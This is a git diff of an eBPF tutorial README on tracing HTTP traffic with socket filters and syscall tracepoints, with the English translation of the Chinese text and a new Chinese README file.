sizeof(*e), 0); @@ -384,11 +373,11 @@ if (!e) return 0; ``` -这部分代码尝试从BPF环形缓冲区中保留一块内存以存储事件信息。如果无法保留内存块,返回0。BPF环形缓冲区用于在eBPF程序和用户空间之间传递事件数据。 +This section of the code attempts to reserve a block of memory from the BPF ring buffer to store event information. If it cannot reserve the memory block, it returns 0. The BPF ring buffer is used to pass event data between the eBPF program and user space. -需要了解: +Key point: -- BPF环形缓冲区:BPF环形缓冲区是一种在eBPF程序和用户空间之间传递数据的机制。它可以用来存储事件信息,以便用户空间应用程序进行进一步处理或分析。 +- BPF Ring Buffer: The BPF ring buffer is a mechanism for passing data between eBPF programs and user space. It can be used to store event information for further processing or analysis by user space applications. ```c e->ip_proto = ip_proto; @@ -406,53 +395,51 @@ bpf_ringbuf_submit(e, 0); return skb->len; ``` -最后,这段代码将捕获到的事件信息存储在`e`结构体中,并将 +Finally, this code segment stores the captured event information in the `e` structure and submits it to the BPF ring buffer. It includes information such as the captured IP protocol, source and destination ports, packet type, interface index, payload length, source IP address, and destination IP address. Finally, it returns the length of the packet, indicating that the packet was successfully processed. -其提交到BPF环形缓冲区。它包括了捕获的IP协议、源端口和目标端口、数据包类型、接口索引、载荷长度、源IP地址和目标IP地址等信息。最后,它返回数据包的长度,表示成功处理了数据包。 +This code is primarily used to store captured event information for further processing. The BPF ring buffer is used to pass this information to user space for additional handling or logging. -这段代码主要用于将捕获的事件信息存储起来,以便后续的处理和分析。 BPF环形缓冲区用于将这些信息传递到用户空间,供用户空间应用程序进一步处理或记录。 +In summary, this eBPF program's main task is to capture HTTP requests. It accomplishes this by parsing the Ethernet frame, IP header, and TCP header of incoming packets to determine if they contain HTTP requests. Information about the requests is then stored in the `so_event` structure and submitted to the BPF ring buffer. This is an efficient method for capturing HTTP traffic at the kernel level and is suitable for applications such as network monitoring and security analysis. -总结:这段eBPF程序的主要任务是捕获HTTP请求,它通过解析数据包的以太网帧、IP头部和TCP头部来确定数据包是否包含HTTP请求,并将有关请求的信息存储在`so_event`结构体中,然后提交到BPF环形缓冲区。这是一种高效的方法,可以在内核层面捕获HTTP流量,适用于网络监控和安全分析等应用。 +### Potential Limitations -### 潜在缺陷 +The above code has some potential limitations, and one of the main limitations is that it cannot handle URLs that span multiple packets. -上述代码也存在一些潜在的缺陷,其中一个主要缺陷是它无法处理跨多个数据包的URL。 +- Cross-Packet URLs: The code checks the URL in an HTTP request by parsing a single data packet. If the URL of an HTTP request spans multiple packets, it will only examine the URL in the first packet. This can lead to missing or partially capturing long URLs that span multiple data packets. -- 跨包URL:代码中通过解析单个数据包来检查HTTP请求中的URL,如果HTTP请求的URL跨足够多的数据包,那么只会检查第一个数据包中的URL部分。这会导致丢失或部分记录那些跨多个数据包的长URL。 +To address this issue, a solution often involves reassembling multiple packets to reconstruct the complete HTTP request. This may require implementing packet caching and assembly logic within the eBPF program and waiting to collect all relevant packets until the HTTP request is detected. This adds complexity and may require additional memory to handle cases where URLs span multiple packets. -解决这个问题的方法通常需要对多个数据包进行重新组装,以还原完整的HTTP请求。这可能需要在eBPF程序中实现数据包的缓存和组装逻辑,并在检测到HTTP请求结束之前等待并收集所有相关数据包。这需要更复杂的逻辑和额外的内存来处理跨多个数据包的情况。 +### User-Space Code -### 用户态代码 - -用户态代码的主要目的是创建一个原始套接字(raw socket),然后将先前在内核中定义的eBPF程序附加到该套接字上,从而允许eBPF程序捕获和处理从该套接字接收到的网络数据包,例如: +The user-space code's main purpose is to create a raw socket and then attach the previously defined eBPF program in the kernel to that socket, allowing the eBPF program to capture and process network packets received on that socket. Here's an example of the user-space code: ```c - /* Create raw socket for localhost interface */ - sock = open_raw_sock(interface); - if (sock < 0) { - err = -2; - fprintf(stderr, "Failed to open raw socket\n"); - goto cleanup; - } +/* Create raw socket for localhost interface */ +sock = open_raw_sock(interface); +if (sock < 0) { + err = -2; + fprintf(stderr, "Failed to open raw socket\n"); + goto cleanup; +} - /* Attach BPF program to raw socket */ - prog_fd = bpf_program__fd(skel->progs.socket_handler); - if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { - err = -3; - fprintf(stderr, "Failed to attach to raw socket\n"); - goto cleanup; - } +/* Attach BPF program to raw socket */ +prog_fd = bpf_program__fd(skel->progs.socket_handler); +if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { + err = -3; + fprintf(stderr, "Failed to attach to raw socket\n"); + goto cleanup; +} ``` -1. `sock = open_raw_sock(interface);`:这行代码调用了一个自定义的函数`open_raw_sock`,该函数用于创建一个原始套接字。原始套接字允许用户态应用程序直接处理网络数据包,而不经过协议栈的处理。函数`open_raw_sock`可能需要一个参数 `interface`,用于指定网络接口,以便确定从哪个接口接收数据包。如果创建套接字失败,它将返回一个负数,否则返回套接字的文件描述符`sock`。 -2. 如果`sock`的值小于0,表示打开原始套接字失败,那么将`err`设置为-2,并在标准错误流上输出一条错误信息。 -3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`:这行代码获取之前在eBPF程序定义中的套接字过滤器程序(`socket_handler`)的文件描述符,以便后续将它附加到套接字上。`skel`是一个eBPF程序对象的指针,可以通过它来访问程序集合。 -4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`:这行代码使用`setsockopt`系统调用将eBPF程序附加到原始套接字。它设置了`SO_ATTACH_BPF`选项,将eBPF程序的文件描述符传递给该选项,以便内核知道要将哪个eBPF程序应用于这个套接字。如果附加成功,套接字将开始捕获和处理从中接收到的网络数据包。 -5. 如果`setsockopt`失败,它将`err`设置为-3,并在标准错误流上输出一条错误信息。 +1. `sock = open_raw_sock(interface);`: This line of code calls a custom function `open_raw_sock`, which is used to create a raw socket. Raw sockets allow a user-space application to handle network packets directly without going through the protocol stack. The `interface` parameter might specify the network interface from which to receive packets, determining where to capture packets from. If creating the socket fails, it returns a negative value, otherwise, it returns the file descriptor of the socket `sock`. +2. If the value of `sock` is less than 0, indicating a failure to open the raw socket, it sets `err` to -2 and prints an error message on the standard error stream. +3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`: This line of code retrieves the file descriptor of the socket filter program (`socket_handler`) previously defined in the eBPF program. It is necessary to attach this program to the socket. `skel` is a pointer to an eBPF program object, and it provides access to the program collection. +4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`: This line of code uses the `setsockopt` system call to attach the eBPF program to the raw socket. It sets the `SO_ATTACH_BPF` option and passes the file descriptor of the eBPF program to the option, letting the kernel know which eBPF program to apply to this socket. If the attachment is successful, the socket starts capturing and processing network packets received on it. +5. If `setsockopt` fails, it sets `err` to -3 and prints an error message on the standard error stream. -### 编译运行 +### Compilation and Execution -完整的源代码可以在 中找到。关于如何安装依赖,请参考: 编译运行上述代码: +The complete source code can be found at . To compile and run the code: ```console $ git submodule update --init --recursive @@ -465,7 +452,7 @@ $ sudo ./sockfilter ... ``` -在另外一个窗口中,使用 python 启动一个简单的 web server: +In another terminal, start a simple web server using Python: ```console python3 -m http.server @@ -473,7 +460,7 @@ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 127.0.0.1 - - [18/Sep/2023 01:05:52] "GET / HTTP/1.1" 200 - ``` -可以使用 curl 发起请求: +You can use `curl` to make requests: ```c $ curl http://0.0.0.0:8000/ @@ -485,7 +472,7 @@ $ curl http://0.0.0.0:8000/ .... ``` -在 eBPF 程序中,可以看到打印出了 HTTP 请求的内容: +In the eBPF program, you can see that it prints the content of HTTP requests: ```console 127.0.0.1:34552(src) -> 127.0.0.1:8000(dst) @@ -499,11 +486,11 @@ Server: SimpleHTTP/0.6 Python/3.11.4 ... ``` -分别包含了请求和响应的内容。 +It captures both request and response content. -## 使用 eBPF syscall tracepoint 来捕获 HTTP 流量 +## Capturing HTTP Traffic Using eBPF Syscall Tracepoints -eBPF 提供了一种强大的机制,允许我们在内核级别追踪系统调用。在这个示例中,我们将使用 eBPF 追踪 accept 和 read 系统调用,以捕获 HTTP 流量。由于篇幅有限,这里我们仅仅对代码框架做简要的介绍。 +eBPF provides a powerful mechanism for tracing system calls at the kernel level. In this example, we'll use eBPF to trace the `accept` and `read` system calls to capture HTTP traffic. Due to space limitations, we'll provide a brief overview of the code framework. ```c struct @@ -514,24 +501,24 @@ struct __type(value, struct accept_args_t); } active_accept_args_map SEC(".maps"); -// 定义在 accept 系统调用入口的追踪点 +// Define a tracepoint at the entry of the accept system call SEC("tracepoint/syscalls/sys_enter_accept") int sys_enter_accept(struct trace_event_raw_sys_enter *ctx) { u64 id = bpf_get_current_pid_tgid(); - // ... 获取和存储 accept 调用的参数 + // ... Get and store the arguments of the accept call bpf_map_update_elem(&active_accept_args_map, &id, &accept_args, BPF_ANY); return 0; } -// 定义在 accept 系统调用退出的追踪点 +// Define a tracepoint at the exit of the accept system call SEC("tracepoint/syscalls/sys_exit_accept") int sys_exit_accept(struct trace_event_raw_sys_exit *ctx) { - // ... 处理 accept 调用的结果 + // ... Process the result of the accept call struct accept_args_t *args = bpf_map_lookup_elem(&active_accept_args_map, &id); - // ... 获取和存储 accept 调用获得的 socket 文件描述符 + // ... Get and store the socket file descriptor obtained from the accept call __u64 pid_fd = ((__u64)pid << 32) | (u32)ret_fd; bpf_map_update_elem(&conn_info_map, &pid_fd, &conn_info, BPF_ANY); // ... @@ -545,26 +532,26 @@ struct __type(value, struct data_args_t); } active_read_args_map SEC(".maps"); -// 定义在 read 系统调用入口的追踪点 +// Define a tracepoint at the entry of the read system call SEC("tracepoint/syscalls/sys_enter_read") int sys_enter_read(struct trace_event_raw_sys_enter *ctx) { - // ... 获取和存储 read 调用的参数 + // ... Get and store the arguments of the read call bpf_map_update_elem(&active_read_args_map, &id, &read_args, BPF_ANY); return 0; } -// 辅助函数,检查是否为 HTTP 连接 +// Helper function to check if it's an HTTP connection static inline bool is_http_connection(const char *line_buffer, u64 bytes_count) { - // ... 检查数据是否为 HTTP 请求或响应 + // ... Check if the data is an HTTP request or response } -// 辅助函数,处理读取的数据 +// Helper function to process the read data static inline void process_data(struct trace_event_raw_sys_exit *ctx, u64 id, const struct data_args_t *args, u64 bytes_count) { - // ... 处理读取的数据,检查是否为 HTTP 流量,并发送事件 + // ... Process the read data, check if it's HTTP traffic, and send events if (is_http_connection(line_buffer, bytes_count)) { // ... @@ -575,11 +562,11 @@ static inline void process_data(struct trace_event_raw_sys_exit *ctx, } } -// 定义在 read 系统调用退出的追踪点 +// Define a tracepoint at the exit of the read system call SEC("tracepoint/syscalls/sys_exit_read") int sys_exit_read(struct trace_event_raw_sys_exit *ctx) { - // ... 处理 read 调用的结果 + // ... Process the result of the read call struct data_args_t *read_args = bpf_map_lookup_elem(&active_read_args_map, &id); if (read_args != NULL) { @@ -592,61 +579,61 @@ int sys_exit_read(struct trace_event_raw_sys_exit *ctx) char _license[] SEC("license") = "GPL"; ``` -这段代码简要展示了如何使用eBPF追踪Linux内核中的系统调用来捕获HTTP流量。以下是对代码的hook位置和流程的详细解释,以及需要hook哪些系统调用来实现完整的请求追踪: +This code briefly demonstrates how to use eBPF to trace system calls in the Linux kernel to capture HTTP traffic. Here's a detailed explanation of the hook locations and the flow, as well as the complete set of system calls that need to be hooked for comprehensive request tracing: -### **Hook 位置和流程** +### Hook Locations and Flow -- 该代码使用了eBPF的Tracepoint功能,具体来说,它定义了一系列的eBPF程序,并将它们绑定到了特定的系统调用的Tracepoint上,以捕获这些系统调用的入口和退出事件。 +- The code uses eBPF Tracepoint functionality. Specifically, it defines a series of eBPF programs and binds them to specific system call Tracepoints to capture entry and exit events of these system calls. -- 首先,它定义了两个eBPF哈希映射(`active_accept_args_map`和`active_read_args_map`)来存储系统调用参数。这些映射用于跟踪`accept`和`read`系统调用。 +- First, it defines two eBPF hash maps (`active_accept_args_map` and `active_read_args_map`) to store system call parameters. These maps are used to track `accept` and `read` system calls. -- 接着,它定义了多个Tracepoint追踪程序,其中包括: - - `sys_enter_accept`:定义在`accept`系统调用的入口处,用于捕获`accept`系统调用的参数,并将它们存储在哈希映射中。 - - `sys_exit_accept`:定义在`accept`系统调用的退出处,用于处理`accept`系统调用的结果,包括获取和存储新的套接字文件描述符以及建立连接的相关信息。 - - `sys_enter_read`:定义在`read`系统调用的入口处,用于捕获`read`系统调用的参数,并将它们存储在哈希映射中。 - - `sys_exit_read`:定义在`read`系统调用的退出处,用于处理`read`系统调用的结果,包括检查读取的数据是否为HTTP流量,如果是,则发送事件。 +- Next, it defines multiple Tracepoint tracing programs, including: + - `sys_enter_accept`: Defined at the entry of the `accept` system call, used to capture the arguments of the `accept` system call and store them in the hash map. + - `sys_exit_accept`: Defined at the exit of the `accept` system call, used to process the result of the `accept` system call, including obtaining and storing the new socket file descriptor and related connection information. + - `sys_enter_read`: Defined at the entry of the `read` system call, used to capture the arguments of the `read` system call and store them in the hash map. + - `sys_exit_read`: Defined at the exit of the `read` system call, used to process the result of the `read` system call, including checking if the read data is HTTP traffic and sending events. -- 在`sys_exit_accept`和`sys_exit_read`中,还涉及一些数据处理和事件发送的逻辑,例如检查数据是否为HTTP连接,组装事件数据,并使用`bpf_perf_event_output`将事件发送到用户空间供进一步处理。 +- In `sys_exit_accept` and `sys_exit_read`, there is also some data processing and event sending logic, such as checking if the data is an HTTP connection, assembling event data, and using `bpf_perf_event_output` to send events to user space for further processing. -### **需要 Hook 的完整系统调用** +### Complete Set of System Calls to Hook -要实现完整的HTTP请求追踪,通常需要hook的系统调用包括: +To fully implement HTTP request tracing, the system calls that typically need to be hooked include: -- `socket`:用于捕获套接字创建,以追踪新的连接。 -- `bind`:用于获取绑定的端口信息。 -- `listen`:用于开始监听连接请求。 -- `accept`:用于接受连接请求,获取新的套接字文件描述符。 -- `read`:用于捕获接收到的数据,以检查其中是否包含 HTTP 请求。 -- `write`:用于捕获发送的数据,以检查其中是否包含 HTTP 响应。 +- `socket`: Used to capture socket creation for tracking new connections. +- `bind`: Used to obtain port information where the socket is bound. +- `listen`: Used to start listening for connection requests. +- `accept`: Used to accept connection requests and obtain new socket file descriptors. +- `read`: Used to capture received data and check if it contains HTTP requests. +- `write`: Used to capture sent data and check if it contains HTTP responses. -上述代码已经涵盖了`accept`和`read`系统调用的追踪。要完整实现HTTP请求的追踪,还需要hook其他系统调用,并实现相应的逻辑来处理这些系统调用的参数和结果。 +The provided code already covers the tracing of `accept` and `read` system calls. To complete HTTP request tracing, additional system calls need to be hooked, and corresponding logic needs to be implemented to handle the parameters and results of these system calls. -完整的源代码可以在 中找到。 +The complete source code can be found at . -## 总结 +## Summary -在当今复杂的技术环境中,系统的可观测性变得至关重要,特别是在微服务和云原生应用程序的背景下。本文探讨了如何利用eBPF技术来追踪七层协议,以及在这个过程中可能面临的挑战和解决方案。以下是对本文内容的总结: +In today's complex technological landscape, system observability has become crucial, especially in the context of microservices and cloud-native applications. This article explores how to leverage eBPF technology for tracing the seven-layer protocols, along with the challenges and solutions that may arise in this process. Here's a summary of the content covered in this article: -1. **背景介绍**: - - 现代应用程序通常由多个微服务和分布式组件组成,因此观测整个系统的行为至关重要。 - - 七层协议(如HTTP、gRPC、MQTT等)提供了深入了解应用程序交互的详细信息,但监控这些协议通常具有挑战性。 +1. **Introduction**: + - Modern applications often consist of multiple microservices and distributed components, making it essential to observe the behavior of the entire system. + - Seven-layer protocols (such as HTTP, gRPC, MQTT, etc.) provide detailed insights into application interactions, but monitoring these protocols can be challenging. -2. **eBPF技术的作用**: - - eBPF允许开发者在不修改或插入应用程序代码的情况下,深入内核层来实时观测和分析系统行为。 - - eBPF技术为监控七层协议提供了一个强大的工具,特别适用于微服务环境。 +2. **Role of eBPF Technology**: + - eBPF allows developers to dive deep into the kernel layer for real-time observation and analysis of system behavior without modifying or inserting application code. + - eBPF technology offers a powerful tool for monitoring seven-layer protocols, especially in a microservices environment. -3. **追踪七层协议**: - - 本文介绍了如何追踪HTTP等七层协议的挑战,包括协议的复杂性和动态性。 - - 传统的网络监控工具难以应对七层协议的复杂性。 +3. **Tracing Seven-Layer Protocols**: + - The article discusses the challenges of tracing seven-layer protocols, including their complexity and dynamism. + - Traditional network monitoring tools struggle with the complexity of seven-layer protocols. -4. **eBPF的应用**: - - eBPF提供两种主要方法来追踪七层协议:socket filter和syscall trace。 - - 这两种方法可以帮助捕获HTTP等协议的网络请求数据,并分析它们。 +4. **Applications of eBPF**: + - eBPF provides two primary methods for tracing seven-layer protocols: socket filters and syscall tracing. + - Both of these methods help capture network request data for protocols like HTTP and analyze them. -5. **eBPF实践教程**: - - 本文提供了一个实际的eBPF教程,演示如何使用eBPF socket filter或syscall trace来捕获和分析HTTP流量。 - - 教程内容包括开发eBPF程序、使用eBPF工具链和实施HTTP请求的追踪。 +5. **eBPF Practical Tutorial**: + - The article provides a practical eBPF tutorial demonstrating how to capture and analyze HTTP traffic using eBPF socket filters or syscall tracing. + - The tutorial covers the development of eBPF programs, the use of the eBPF toolchain, and the implementation of HTTP request tracing. -通过这篇文章,读者可以获得深入了解如何使用eBPF技术来追踪七层协议,尤其是HTTP流量的知识。这将有助于更好地监控和分析网络流量,从而提高应用程序性能和安全性。如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +Through this article, readers can gain a deep understanding of how to use eBPF technology for tracing seven-layer protocols, particularly HTTP traffic. This knowledge will help enhance the monitoring and analysis of network traffic, thereby improving application performance and security. If you're interested in learning more about eBPF and its practical applications, you can visit our tutorial code repository at or our website at for more examples and complete tutorials. -> 原文地址: 转载请注明出处。 +> The original link of this article: diff --git a/src/23-http/README.zh.md b/src/23-http/README.zh.md new file mode 100644 index 0000000..a6d1104 --- /dev/null +++ b/src/23-http/README.zh.md @@ -0,0 +1,652 @@ +# 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程 + +在当今的技术环境中,随着微服务、云原生应用和复杂的分布式系统的崛起,系统的可观测性已成为确保其健康、性能和安全的关键要素。特别是在微服务架构中,应用程序的组件可能分布在多个容器和服务器上,这使得传统的监控方法往往难以提供足够的深度和广度来全面了解系统的行为。这就是为什么观测七层协议,如 HTTP、gRPC、MQTT 等,变得尤为重要。 + +七层协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。在微服务环境中,了解这些交互是至关重要的,因为它们经常是性能瓶颈、故障和安全问题的根源。然而,监控这些协议并不简单。传统的网络监控工具,如 tcpdump,虽然在捕获网络流量方面非常有效,但在处理七层协议的复杂性和动态性时,它们往往显得力不从心。 + +这正是 eBPF 技术发挥作用的地方。eBPF 允许开发者和运维人员深入到系统的内核层,实时观测和分析系统的行为,而无需对应用程序代码进行任何修改或插入埋点。这为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务环境中。 + +在本教程中,我们将深入探讨以下内容: + +- 追踪七层协议,如 HTTP,以及与其相关的挑战。 +- eBPF 的 socket filter 和 syscall 追踪:这两种技术如何帮助我们在不同的内核层次追踪 HTTP 网络请求数据,以及这两种方法的优势和局限性。 +- eBPF 实践教程:如何开发一个 eBPF 程序,使用 eBPF socket filter 或 syscall 追踪来捕获和分析 HTTP 流量 + +随着网络流量的增加和应用程序的复杂性增加,对七层协议的深入了解变得越来越重要。通过本教程,您将获得必要的知识和工具,以便更有效地监控和分析您的网络流量,从而为您的应用程序和服务器提供最佳的性能。 + +本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 + +## 追踪 HTTP, HTTP/2 等七层协议的挑战 + +在现代的网络环境中,七层协议不仅仅局限于 HTTP。实际上,有许多七层协议,如 HTTP/2, gRPC, MQTT, WebSocket, AMQP 和 SMTP,它们都在不同的应用场景中发挥着关键作用。这些协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。但是,追踪这些协议并不是一个简单的任务,尤其是在复杂的分布式系统中。 + +1. **多样性和复杂性**:每种七层协议都有其特定的设计和工作原理。例如,gRPC 使用了 HTTP/2 作为其传输协议,并支持多种语言。而 MQTT 是为低带宽和不可靠的网络设计的轻量级发布/订阅消息传输协议。 + +2. **动态性**:许多七层协议都是动态的,这意味着它们的行为可能会根据网络条件、应用需求或其他因素而变化。 + +3. **加密和安全性**:随着安全意识的增强,许多七层协议都采用了加密技术,如 TLS/SSL。这为追踪和分析带来了额外的挑战,因为需要解密流量才能进行深入的分析。 + +4. **高性能需求**:在高流量的生产环境中,捕获和分析七层协议的流量可能会对系统性能产生影响。传统的网络监控工具可能无法处理大量的并发会话。 + +5. **数据的完整性和连续性**:与 tcpdump 这样的工具只捕获单独的数据包不同,追踪七层协议需要捕获完整的会话,这可能涉及多个数据包。这要求工具能够正确地重组和解析这些数据包,以提供连续的会话视图。 + +6. **代码侵入性**:为了深入了解七层协议的行为,开发人员可能需要修改应用程序代码以添加监控功能。这不仅增加了开发和维护的复杂性,而且可能会影响应用程序的性能。 + +正如上文所述,eBPF 提供了一个强大的解决方案,允许我们在内核层面捕获和分析七层协议的流量,而无需对应用程序进行任何修改。这种方法为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务和分布式环境中。 + +在处理网络流量和系统行为时,选择在内核态而非用户态进行处理有其独特的优势。首先,内核态处理可以直接访问系统资源和硬件,从而提供更高的性能和效率。其次,由于内核是操作系统的核心部分,它可以提供对系统行为的全面视图,而不受任何用户空间应用程序的限制。 + +**无插桩追踪("zero-instrumentation observability")**的优势如下: + +1. **性能开销小**:由于不需要修改或添加额外的代码到应用程序中,所以对性能的影响最小化。 +2. **透明性**:开发者和运维人员不需要知道应用程序的内部工作原理,也不需要访问源代码。 +3. **灵活性**:可以轻松地在不同的环境和应用程序中部署和使用,无需进行任何特定的配置或修改。 +4. **安全性**:由于不需要修改应用程序代码,所以降低了引入潜在安全漏洞的风险。 + +利用 eBPF 在内核态进行无插桩追踪,我们可以实时捕获和分析系统的行为,而不需要对应用程序进行任何修改。这种方法不仅提供了对系统深入的洞察力,而且确保了最佳的性能和效率。这是为什么 eBPF 成为现代可观测性工具的首选技术,特别是在需要高性能和低延迟的生产环境中。 + +## eBPF 中的 socket filter 与 syscall 追踪:深入解析与比较 + +### **eBPF Socket Filter** + +**是什么?** +eBPF socket filter 是经典的 Berkeley Packet Filter (BPF) 的扩展,允许在内核中直接进行更高级的数据包过滤。它在套接字层操作,使得可以精细地控制哪些数据包被用户空间应用程序处理。 + +**主要特点:** + +- **性能**:通过在内核中直接处理数据包,eBPF socket filters 减少了用户和内核空间之间的上下文切换的开销。 +- **灵活性**:eBPF socket filters 可以附加到任何套接字,为各种协议和套接字类型提供了通用的数据包过滤机制。 +- **可编程性**:开发者可以编写自定义的 eBPF 程序来定义复杂的过滤逻辑,超越简单的数据包匹配。 + +**用途:** + +- **流量控制**:根据自定义条件限制或优先处理流量。 +- **安全性**:在它们到达用户空间应用程序之前丢弃恶意数据包。 +- **监控**:捕获特定数据包进行分析,而不影响其它流量。 + +### **eBPF Syscall Tracing** + +**是什么?** +使用 eBPF 进行的系统调用跟踪允许监视和操作应用程序发出的系统调用。系统调用是用户空间应用程序与内核交互的主要机制,因此跟踪它们可以深入了解应用程序的行为。 + +**主要特点:** + +- **粒度**:eBPF 允许跟踪特定的系统调用,甚至是这些系统调用中的特定参数。 +- **低开销**:与其他跟踪方法相比,eBPF 系统调用跟踪旨在具有最小的性能影响。 +- **安全性**:内核验证 eBPF 程序,以确保它们不会损害系统稳定性。 + +**工作原理:** +eBPF 系统调用跟踪通常涉及将 eBPF 程序附加到与系统调用相关的 tracepoints 或 kprobes。当跟踪的系统调用被调用时,执行 eBPF 程序,允许收集数据或甚至修改系统调用参数。 + +### eBPF 的 socket filter 和 syscall 追踪的对比 + +| 项目 | eBPF Socket Filter | eBPF Syscall Tracing | +|------|--------------------|----------------------| +| **操作层** | 套接字层,主要处理从套接字接收或发送的网络数据包 | 系统调用层,监视和可能更改应用程序发出的系统调用的行为 | +| **主要用途** | 主要用于网络数据包的过滤、监控和操作 | 用于性能分析、安全监控和系统调用交互的调试 | +| **粒度** | 专注于单个网络数据包 | 可以监视与网络无关的广泛的系统活动 | +| **追踪 HTTP 流量** | 可以用于过滤和捕获通过套接字传递的 HTTP 数据包 | 可以跟踪与网络操作相关的系统调用 | + +总之,eBPF 的 socket filter 和 syscall 追踪都可以用于追踪 HTTP 流量,但 socket filters 更直接且更适合此目的。然而,如果您对应用程序如何与系统交互的更广泛的上下文感兴趣(例如,哪些系统调用导致了 HTTP 流量),那么系统调用跟踪将是非常有价值的。在许多高级的可观察性设置中,这两种工具可能会同时使用,以提供系统和网络行为的全面视图。 + +## 使用 eBPF socket filter 来捕获 HTTP 流量 + +eBPF 代码由用户态和内核态组成,这里主要关注于内核态代码。这是使用 eBPF socket filter 技术来在内核中捕获HTTP流量的主要逻辑,完整代码如下: + +```c +SEC("socket") +int socket_handler(struct __sk_buff *skb) +{ + struct so_event *e; + __u8 verlen; + __u16 proto; + __u32 nhoff = ETH_HLEN; + __u32 ip_proto = 0; + __u32 tcp_hdr_len = 0; + __u16 tlen; + __u32 payload_offset = 0; + __u32 payload_length = 0; + __u8 hdr_len; + + bpf_skb_load_bytes(skb, 12, &proto, 2); + proto = __bpf_ntohs(proto); + if (proto != ETH_P_IP) + return 0; + + if (ip_is_fragment(skb, nhoff)) + return 0; + + // ip4 header lengths are variable + // access ihl as a u8 (linux/include/linux/skbuff.h) + bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len)); + hdr_len &= 0x0f; + hdr_len *= 4; + + /* verify hlen meets minimum size requirements */ + if (hdr_len < sizeof(struct iphdr)) + { + return 0; + } + + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); + + if (ip_proto != IPPROTO_TCP) + { + return 0; + } + + tcp_hdr_len = nhoff + hdr_len; + bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); + + __u8 doff; + bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff)); // read the first byte past __tcphdr->ack_seq, we can't do offsetof bit fields + doff &= 0xf0; // clean-up res1 + doff >>= 4; // move the upper 4 bits to low + doff *= 4; // convert to bytes length + + payload_offset = ETH_HLEN + hdr_len + doff; + payload_length = __bpf_ntohs(tlen) - hdr_len - doff; + + char line_buffer[7]; + if (payload_length < 7 || payload_offset < 0) + { + return 0; + } + bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); + bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); + if (bpf_strncmp(line_buffer, 3, "GET") != 0 && + bpf_strncmp(line_buffer, 4, "POST") != 0 && + bpf_strncmp(line_buffer, 3, "PUT") != 0 && + bpf_strncmp(line_buffer, 6, "DELETE") != 0 && + bpf_strncmp(line_buffer, 4, "HTTP") != 0) + { + return 0; + } + + /* reserve sample from BPF ringbuf */ + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (!e) + return 0; + + e->ip_proto = ip_proto; + bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4); + e->pkt_type = skb->pkt_type; + e->ifindex = skb->ifindex; + + e->payload_length = payload_length; + bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE); + + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), &(e->src_addr), 4); + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4); + bpf_ringbuf_submit(e, 0); + + return skb->len; +} +``` + +当分析这段eBPF程序时,我们将按照每个代码块的内容来详细解释,并提供相关的背景知识: + +```c +SEC("socket") +int socket_handler(struct __sk_buff *skb) +{ + // ... +} +``` + +这是eBPF程序的入口点,它定义了一个名为 `socket_handler` 的函数,它会被内核用于处理传入的网络数据包。这个函数位于一个名为 `socket` 的 eBPF 节(section)中,表明这个程序用于套接字处理。 + +```c +struct so_event *e; +__u8 verlen; +__u16 proto; +__u32 nhoff = ETH_HLEN; +__u32 ip_proto = 0; +__u32 tcp_hdr_len = 0; +__u16 tlen; +__u32 payload_offset = 0; +__u32 payload_length = 0; +__u8 hdr_len; +``` + +在这个代码块中,我们定义了一些变量来存储在处理数据包时需要的信息。这些变量包括了`struct so_event *e`用于存储事件信息,`verlen`、`proto`、`nhoff`、`ip_proto`、`tcp_hdr_len`、`tlen`、`payload_offset`、`payload_length`、`hdr_len`等用于存储数据包信息的变量。 + +- `struct so_event *e;`:这是一个指向`so_event`结构体的指针,用于存储捕获到的事件信息。该结构体的具体定义在程序的其他部分。 +- `__u8 verlen;`、`__u16 proto;`、`__u32 nhoff = ETH_HLEN;`:这些变量用于存储各种信息,例如协议类型、数据包偏移量等。`nhoff`初始化为以太网帧头部的长度,通常为14字节,因为以太网帧头部包括目标MAC地址、源MAC地址和帧类型字段。 +- `__u32 ip_proto = 0;`:这个变量用于存储IP协议的类型,初始化为0。 +- `__u32 tcp_hdr_len = 0;`:这个变量用于存储TCP头部的长度,初始化为0。 +- `__u16 tlen;`:这个变量用于存储IP数据包的总长度。 +- `__u32 payload_offset = 0;`、`__u32 payload_length = 0;`:这两个变量用于存储HTTP请求的载荷(payload)的偏移量和长度。 +- `__u8 hdr_len;`:这个变量用于存储IP头部的长度。 + +```c +bpf_skb_load_bytes(skb, 12, &proto, 2); +proto = __bpf_ntohs(proto); +if (proto != ETH_P_IP) + return 0; +``` + 